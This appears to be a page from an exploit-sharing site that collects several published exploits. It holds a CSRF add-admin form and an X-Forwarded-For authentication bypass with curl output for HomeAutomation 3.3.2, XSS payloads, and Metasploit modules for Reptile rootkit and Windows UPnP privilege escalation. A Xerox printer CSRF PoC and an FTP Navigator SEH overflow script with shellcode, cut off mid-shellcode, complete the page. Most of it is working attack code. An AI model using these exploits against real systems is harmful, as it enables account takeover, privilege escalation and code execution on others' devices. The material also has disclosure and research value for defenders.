HireHackking

# Exploit: HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin) # Date: 2019-12-30 # Author: LiquidWorm # Vendor: Tom Rosenback and Daniel Malmgren # Product web page: http://karpero.mine.nu/ha/ # Affected version: 3.3.2 # Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips # Advisory ID: ZSL-2019-5558 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5558.php HomeAutomation v3.3.2 CSRF Add Admin Exploit Vendor: Tom Rosenback and Daniel Malmgren Product web page: http://karpero.mine.nu/ha/ Affected version: 3.3.2 Summary: HomeAutomation is an open-source web interface and scheduling solution. It was initially made for use with the Telldus TellStick, but is now based on a plugin system and except for Tellstick it also comes with support for Crestron, OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers, etc.) based on an advanced scheduling system, taking into account things like measurements from various sensors. With the houseplan view you can get a simple overview of the status of your devices at their location in your house. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips Apache/2.4.29 (Ubuntu) PHP/7.4.0RC4 PHP/7.3.11 PHP 7.2.24-0ubuntu0.18.04.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5558 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5558.php 06.11.2019 -- <html> <body> <form action="http://localhost/homeautomation_v3_3_2/?page=conf-usercontrol" method="POST"> <input type="hidden" name="id" value="-1" /> <input type="hidden" name="action" value="save" /> <input type="hidden" name="editable" value="2" /> <input type="hidden" name="username" value="testingus" /> <input type="hidden" name="password" value="123456" /> <input type="hidden" name="firstname" value="Tester" /> <input type="hidden" name="lastname" value="Testovski" /> <input type="hidden" name="email" value="test@zeroscience.mk" /> <input type="hidden" name="userlevel" value="3" /> <input type="hidden" name="save" value="Save" /> <input type="submit" value="Addmoi" /> </form> </body> </html>

# Exploit: HomeAutomation 3.3.2 - Authentication Bypass # Date: 2019-12-30 # Author: LiquidWorm # Vendor: Tom Rosenback and Daniel Malmgren # Product web page: http://karpero.mine.nu/ha/ # Affected version: 3.3.2 # Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips # Advisory ID: ZSL-2019-5557 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php HomeAutomation v3.3.2 Authentication Bypass Exploit Vendor: Tom Rosenback and Daniel Malmgren Product web page: http://karpero.mine.nu/ha/ Affected version: 3.3.2 Summary: HomeAutomation is an open-source web interface and scheduling solution. It was initially made for use with the Telldus TellStick, but is now based on a plugin system and except for Tellstick it also comes with support for Crestron, OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers, etc.) based on an advanced scheduling system, taking into account things like measurements from various sensors. With the houseplan view you can get a simple overview of the status of your devices at their location in your house. Desc: The application suffers from an authentication bypass vulnerability when spoofing client IP address using the X-Forwarded-For header with the local (loopback) IP address value allowing remote control of the smart home solution. =============================================================================== /modules/login/login.module.php: -------------------------------- 19: if(!defined("HomeAutomationIncluded")) { die("HomeAutomation: Direct access not premitted"); } 20: 21: if($_SESSION[CFG_SESSION_KEY]["userlevel"] < 1 && $action == "default" && isIpLocal() && getFormVariable("autologin", "") == "") 22: { 23: // if user is not logged in and action is default, user is visiting locally and autologin is NOT set, allow autologin. 24: $action = "login"; 25: } 26: 27: ?> =============================================================================== /functions.php: --------------- 733: function isIpLocal() { 734: 735: if(substr(getIpAddress(), 0, 4) == "127.") { 736: return true; 737: } 738: 739: $isIpLocal = false; 740: 741: $localip = $_SESSION[CFG_SESSION_KEY]["settings"]["localip"]; 742: 743: $localnets = explode(";", $localip); 744: foreach($localnets as $localnet) { 745: list($localnet, $localmask) = explode("/", $localnet); 746: if($localmask == "") { 747: $localmask = 32; 748: } 749: if($localmask == "" || $localmask > 32 || $localmask < 0) { 750: $localmask = 32; 751: } 752: 753: // $mask = $localmask; 754: 755: $localnet = ip2long($localnet); 756: $localmask = ~((1 << (32-$localmask)) - 1); 757: $remoteip = ip2long(getIpAddress()); 758: $maskedip = $remoteip & $localmask; 759: $maskednet = $localnet & $localmask; 760: 761: // echo "<br />localnet:"; 762: // printf('%1$32b', $localnet); 763: 764: // echo "<br />localmask: (dec: ".$mask.")"; 765: // printf('%1$32b', $localmask); 766: 767: // echo "<br />remoteip:"; 768: // printf('%1$32b', $remoteip); 769: 770: // echo "<br />maskedip:"; 771: // printf('%1$32b', $maskedip); 772: 773: // echo "<br />maskednet:"; 774: // printf('%1$32b', $maskednet); 775: 776: if($maskedip == $maskednet) { 777: // echo "<br />maskedip == maskednet"; 778: $isIpLocal = true; 779: break; 780: } 781: } 782: // $isIpLocal = false; 783: return $isIpLocal; 784: } 785: 786: function getIpAddress() { 787: return isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"]; 788: } =============================================================================== Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips Apache/2.4.29 (Ubuntu) PHP/7.4.0RC4 PHP/7.3.11 PHP 7.2.24-0ubuntu0.18.04.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5557 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php 06.11.2019 -- PoC auth bypass and arbitrary cookie setup grepping auth'd content view: ------------------------------------------------------------------------ root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -H "X-Forwarded-For: 127.31.33.7" -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros * Trying 192.168.2.113... * Connected to 192.168.2.113 (192.168.2.113) port 443 (#0) * found 173 certificates in /etc/ssl/certs/ca-certificates.crt * found 696 certificates in /etc/ssl/certs * ALPN, offering h2 * ALPN, offering http/1.1 * SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256 * server certificate verification SKIPPED * server certificate status verification SKIPPED * common name: n28.nux.se (does not match '192.168.2.113') * server certificate expiration date OK * server certificate activation date OK * certificate public key: RSA * certificate version: #3 * subject: CN=n28.nux.se * start date: Mon, 21 Oct 2019 12:18:27 GMT * expire date: Sun, 19 Jan 2020 12:18:27 GMT * issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3 * compression: NULL * ALPN, server accepted to use http/1.1 > GET /index.php HTTP/1.1 > Host: 192.168.2.113 > User-Agent: ZSL/0.2 (SpoofDetect 1.0) > Accept: */* > Cookie: PHPSESSID=11111111110000000000666666 > X-Forwarded-For: 127.31.33.7 > < HTTP/1.1 303 See Other < Date: Wed, 20 Nov 2019 01:06:16 GMT < Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips < X-Powered-By: PHP/7.3.11 < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate < Pragma: no-cache < Strict-Transport-Security: max-age=63072000; includeSubdomains < X-Frame-Options: DENY < X-Content-Type-Options: nosniff < Location: ./index.php?page=houseplan < Content-Length: 0 < Content-Type: text/html; charset=UTF-8 < * Connection #0 to host 192.168.2.113 left intact * Issue another request to this URL: 'https://192.168.2.113/index.php?page=houseplan' * Found bundle for host 192.168.2.113: 0x55c160ef7c40 [can pipeline] * Re-using existing connection! (#0) with host 192.168.2.113 * Connected to 192.168.2.113 (192.168.2.113) port 443 (#0) > GET /index.php?page=houseplan HTTP/1.1 > Host: 192.168.2.113 > User-Agent: ZSL/0.2 (SpoofDetect 1.0) > Accept: */* > Cookie: PHPSESSID=11111111110000000000666666 > X-Forwarded-For: 127.31.33.7 > < HTTP/1.1 200 OK < Date: Wed, 20 Nov 2019 01:06:16 GMT < Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips < X-Powered-By: PHP/7.3.11 < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate < Pragma: no-cache < Strict-Transport-Security: max-age=63072000; includeSubdomains < X-Frame-Options: DENY < X-Content-Type-Options: nosniff < Transfer-Encoding: chunked < Content-Type: text/html; charset=UTF-8 < { [6 bytes data] * </li><li>| <a href="./index.php?page=macros">Macros</a> Connection #0 to host 192.168.2.113 left intact root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros * Trying 192.168.2.113... * Connected to 192.168.2.113 (192.168.2.113) port 443 (#0) * found 173 certificates in /etc/ssl/certs/ca-certificates.crt * found 696 certificates in /etc/ssl/certs * ALPN, offering h2 * ALPN, offering http/1.1 * SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256 * server certificate verification SKIPPED * server certificate status verification SKIPPED * common name: n28.nux.se (does not match '192.168.2.113') * server certificate expiration date OK * server certificate activation date OK * certificate public key: RSA * certificate version: #3 * subject: CN=n28.nux.se * start date: Mon, 21 Oct 2019 12:18:27 GMT * expire date: Sun, 19 Jan 2020 12:18:27 GMT * issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3 * compression: NULL * ALPN, server accepted to use http/1.1 > GET /index.php HTTP/1.1 > Host: 192.168.2.113 > User-Agent: ZSL/0.2 (SpoofDetect 1.0) > Accept: */* > Cookie: PHPSESSID=11111111110000000000666666 > < HTTP/1.1 200 OK < Date: Wed, 20 Nov 2019 01:06:25 GMT < Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips < X-Powered-By: PHP/7.3.11 < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate < Pragma: no-cache < Strict-Transport-Security: max-age=63072000; includeSubdomains < X-Frame-Options: DENY < X-Content-Type-Options: nosniff < Transfer-Encoding: chunked < Content-Type: text/html; charset=UTF-8 < { [6 bytes data] </li><li>| <a href="./index.php?page=macros">Macros</a> * Connection #0 to host 192.168.2.113 left intact root@kali:~/homeautomation# PoC auth bypass retrieving valid Cookie: ----------------------------------------- root@kali:~/homeautomation# $(curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/?page=houseplan -L -H "X-Forwarded-For: 127.1.1.1" --cookie-jar cookies.txt -o /dev/null) ; echo -ne "Your cookie: " ;tail -c -27 cookies.txt Your cookie: k4dic6crpr4d4u71tr13gvtmsv

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation', 'Description' => %q{ This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64). }, 'License' => MSF_LICENSE, 'Author' => [ 'f0rb1dd3n', # Reptile 'bcoles' # Metasploit ], 'DisclosureDate' => '2018-10-29', # Reptile first stable release 'References' => [ ['URL', 'https://github.com/f0rb1dd3n/Reptile'], ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage'] ], 'Platform' => ['linux'], 'Arch' => [ARCH_X86, ARCH_X64], 'SessionTypes' => ['shell', 'meterpreter'], 'Targets' => [['Auto', {}]], 'Notes' => { 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ] }, 'DefaultTarget' => 0)) register_options [ OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd']) ] register_advanced_options [ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) ] end def reptile_cmd_path datastore['REPTILE_CMD_PATH'] end def base_dir datastore['WritableDir'].to_s end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." rm_f path write_file path, data register_file_for_cleanup path end def upload_and_chmodx(path, data) upload path, data chmod path end def check unless executable? reptile_cmd_path vprint_error "#{reptile_cmd_path} is not executable" return CheckCode::Safe end vprint_good "#{reptile_cmd_path} is executable" res = cmd_exec("echo id|#{reptile_cmd_path} root").to_s.strip vprint_status "Output: #{res}" if res.include?('You have no power here!') vprint_error 'Reptile kernel module is not loaded' return CheckCode::Safe end unless res.include?('root') vprint_error 'Reptile is not installed' return CheckCode::Safe end vprint_good 'Reptile is installed and loaded' CheckCode::Vulnerable end def exploit unless check == CheckCode::Vulnerable unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end if is_root? unless datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end end unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end payload_name = ".#{rand_text_alphanumeric 8..12}" payload_path = "#{base_dir}/#{payload_name}" upload_and_chmodx payload_path, generate_payload_exe print_status 'Executing payload...' res = cmd_exec "echo '#{payload_path}&' | #{reptile_cmd_path} root & echo " vprint_line res end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/windows/priv' require 'msf/core/post/windows/registry' require 'msf/core/exploit/exe' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft UPnP Local Privilege Elevation Vulnerability', 'Description' => %q( This exploit uses two vulnerabilities to execute a command as an elevated user. The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to NT AUTHORITY\LOCAL SERVICE The second (CVE-2019-1322) leverages the Update Orchestrator Service to elevate from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM. ), 'License' => MSF_LICENSE, 'Author' => [ 'NCC Group', # Original discovery (https://www.nccgroup.trust/uk/) 'hoangprod', # PoC 'bwatters-r7' # msf module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [ ['Windows x64', { 'Arch' => ARCH_X64 }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 12 2019', 'References' => [ ['CVE', '2019-1322'], ['CVE', '2019-1405'], ['EDB', '47684'], ['URL', 'https://github.com/apt69/COMahawk'], ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'], ['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1'] ], 'DefaultOptions' => { 'DisablePayloadHandler' => false } )) register_options([ OptString.new('EXPLOIT_NAME', [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]), OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]), OptString.new('WRITABLE_DIR', [false, 'Path to write binaries (%TEMP% by default).', nil]), OptInt.new('EXPLOIT_TIMEOUT', [true, 'The number of seconds to wait for exploit to finish running', 60]), OptInt.new('EXECUTE_DELAY', [true, 'The number of seconds to delay between file upload and exploit launch', 3]) ]) end def exploit exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14) payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14) exploit_name = "#{exploit_name}.exe" unless exploit_name.end_with?('.exe') payload_name = "#{payload_name}.exe" unless payload_name.end_with?('.exe') temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP') payload_path = "#{temp_path}\\#{payload_name}" exploit_path = "#{temp_path}\\#{exploit_name}" payload_exe = generate_payload_exe # Check target vprint_status("Checking Target") validate_active_host validate_target fail_with(Failure::BadConfig, "#{temp_path} does not exist on the target") unless directory?(temp_path) # Upload Exploit vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}") ensure_clean_destination(exploit_path) exploit_bin = exploit_data('cve-2019-1322', 'CVE-2019-1322-EXE.exe') write_file(exploit_path, exploit_bin) print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}") # Upload Payload vprint_status("Uploading Payload") ensure_clean_destination(payload_path) write_file(payload_path, payload_exe) print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}") print_warning("This exploit requires manual cleanup of the payload #{payload_path}") # Run Exploit vprint_status("Running Exploit") print_status("It may take a moment after the session is established for the exploit to exit safely.") begin cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}", 60) rescue Rex::TimeoutError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") print_error("Caught timeout. Exploit may be taking longer or it may have failed.") end vprint_status("Cleaning up #{exploit_path}") ensure_clean_destination(exploit_path) end def validate_active_host begin print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") rescue Rex::Post::Meterpreter::RequestError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") raise Msf::Exploit::Failed, 'Could not connect to session' end end def validate_target if sysinfo['Architecture'] == ARCH_X86 fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') end sysinfo_value = sysinfo['OS'] build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i vprint_status("Build Number = #{build_num}") unless sysinfo_value =~ /10/ && (build_num > 17133 && build_num < 18362) fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362') end end def ensure_clean_destination(path) return unless file?(path) print_status("#{path} already exists on the target. Deleting...") begin file_rm(path) print_status("Deleted #{path}") rescue Rex::Post::Meterpreter::RequestError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") print_error("Unable to delete #{path}") end end end

# Exploit: HomeAutomation 3.3.2 - Persistent Cross-Site Scripting # Date: 2019-12-30 # Author: LiquidWorm # Vendor: Tom Rosenback and Daniel Malmgren # Product web page: http://karpero.mine.nu/ha/ # Affected version: 3.3.2 # Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips # Advisory ID: ZSL-2019-5556 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php # HomeAutomation v3.3.2 Stored and Reflected XSS Vendor: Tom Rosenback and Daniel Malmgren Product web page: http://karpero.mine.nu/ha/ Affected version: 3.3.2 Summary: HomeAutomation is an open-source web interface and scheduling solution. It was initially made for use with the Telldus TellStick, but is now based on a plugin system and except for Tellstick it also comes with support for Crestron, OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers, etc.) based on an advanced scheduling system, taking into account things like measurements from various sensors. With the houseplan view you can get a simple overview of the status of your devices at their location in your house. Desc: HomeAutomation suffers from multiple stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips Apache/2.4.29 (Ubuntu) PHP/7.4.0RC4 PHP/7.3.11 PHP 7.2.24-0ubuntu0.18.04.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5556 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php 06.11.2019 -- Reflected XSS: -------------- https://192.168.2.113/?page=houseplan&autologin=1&msg=eyJpZCI6IiIsInRleHQiOiI8bWFycXVlZT50ZXN0PC9tYXJxdWVlPlVzZXJuYW1lIG9yIHBhc3N3b3JkIHdyb25nIiwiYWRkaXRpb25hbFRleHQiOiIiLCJ0eXBlIjoiZXJyb3IiLCJhdXRvQ2xvc2UiOmZhbHNlLCJzaG93T25seUluRGVidWciOmZhbHNlfQ== Stored XSS: ----------- POST /homeautomation_v3_3_2/?page=conf-macros HTTP/1.1 Host: localhost Connection: keep-alive Content-Length: 998 Cache-Control: max-age=0 Origin: http://localhost Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryq4LcgA7mbqElCW4q User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36 Sec-Fetch-User: ?1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Referer: http://localhost/homeautomation_v3_3_2/?page=conf-macros&action=edit&id=-1 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: HomeAutomation_user=admin; HomeAutomation_hash=842427e5fc831255d7aa811b70e64957; PHPSESSID=ldcipit064rfp5l8rtcah091og ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="id" -1 ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="action" save ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="name" XSS ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="comment" "><script>confirm(document.cookie)</script> ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="icon_on"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="scenario" 1 ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="devices[0]" 1 ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="statuses[0]" 1 ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="save" Save ------WebKitFormBoundaryq4LcgA7mbqElCW4q--

# Exploit Title: XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin) # Date: 2018-12-19 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.xerox.com/ # Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-6655 # Software : Xerox Printer # Product Version: WorkCentre® 6655 # Vulernability Type : Cross-Site Request Forgery (Add Admin) # Vulenrability : Cross-Site Request Forgery # CVE : N/A # Description : # The CSRF vulnerability was discovered in the WorkCentre® 6655 printer model of Xerox printer hardware. # A request to add users is made in the Device User Database form field. This request is captured by # the proxy. And a CSRF PoC HTML file is prepared. Xerox WorkCentre® 6655 printers allow CSRF. A request # to add users is made in the Device User Database form field to the xerox.set URI. # (The frmUserName value must have a unique name.) HTTP POST Request : POST /dummypost/xerox.set HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 494 Origin: https://server Connection: close Referer: https://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp Cookie: PHPSESSID=d7c4d8f8efe7dd919e6d0f5c93ec16cd; PageToShow=; statusSelected=n1; statusNumNodes=9; frmFirstName=%22%3E%3Ch1%3Ea; frmLastName=%22%3E%3Ch1%3Ea; frmCompany=%22%3E%3Ch1%3Ea; frmDisplayName=%22%3E%3Ch1%3Ea%2C%20%22%3E%3Ch1%3Ea; frmEmail=test@test.com; frmIFax=324324324324; frmFaxNumber=324324324324; frmFriendlyName=; frmProtocol=SMB; frmXrxAdd_1=Ipv4; frmDocumentPath=; frmLoginName=; frmServerName=; frmServerVolume=; frmNdsTree=; frmNdsContext=; frmSmbShare=; frmHnAdd_1=; frmIpv4_1_1=0; frmIpv4_1_2=0; frmIpv4_1_3=0; frmIpv4_1_4=0; frmIpv6_Host_1=%3A%3A; WebTimerPopupID=4; propSelected=n28; propNumNodes=117; propHierarchy=000100000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue Upgrade-Insecure-Requests: 1 CSRFToken=72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1 HTTP Response : HTTP/1.1 200 OK Date: Wed, 18 Dec 2019 22:09:40 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 13518 CSRF HTML PoC : <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://server/dummypost/xerox.set" method="POST"> <input type="hidden" name="CSRFToken" value="72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776" /> <input type="hidden" name="&#95;fun&#95;function" value="HTTP&#95;Set&#95;ccgen&#95;fac&#95;dispatch&#95;fn" /> <input type="hidden" name="NextPage" value="&#47;properties&#47;authentication&#47;UserManager&#46;php&#63;x&#61;&sort&#61;Fname&order&#61;Up" /> <input type="hidden" name="CcgenModule" value="UserEdit" /> <input type="hidden" name="isRoles" value="True" /> <input type="hidden" name="isPassword" value="True" /> <input type="hidden" name="isCreate" value="True" /> <input type="hidden" name="rolesStr" value="2&#44;5&#44;1&#44;" /> <input type="hidden" name="limited" value="False" /> <input type="hidden" name="oid" value="0" /> <input type="hidden" name="userName" value="ismailtasdelen" /> <input type="hidden" name="friendlyName" value="Ismail&#32;Tasdelen" /> <input type="hidden" name="newPassword" value="Test1234" /> <input type="hidden" name="retypePassword" value="Test1234" /> <input type="hidden" name="role" value="2" /> <input type="hidden" name="role" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: FTP Navigator 8.03 - Stack Overflow (SEH) # Date: December 28th, 2019 # Exploit Author: boku # Discovered by: Chris Inzinga # Original DoS: FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH) # Original DoS Link: https://www.exploit-db.com/exploits/47794 # Software Vendor: http://www.internet-soft.com/ # Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1 # Version: Version 8.03 # Tested on: Microsoft Windows 7 Enterprise - 6.1.7601 Service Pack 1 Build 7601 (x86-64) # Recreate: #!/usr/bin/python # 1) Generate 'poc.txt' payload using python 2.7.x # 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy # 3) Install & Open FTP Navigator v8.03 # 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command # - A textbox will appear on the bottom of the right window # 5) Paste payload from generated txt file into textbox # 6) Click "Do it" # - The program will crash & calculator will open blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red error bullet try: nops = '\x90'*400 # msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper #x86/alpha_upper succeeded with size 447 (iteration=0) shellcode = b"" shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49" shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a" shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30" shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41" shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42" shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50" shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39" shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b" shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c" shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a" shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33" shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31" shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b" shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50" shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32" shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31" shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48" shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a" shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e" shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f" shellcode += 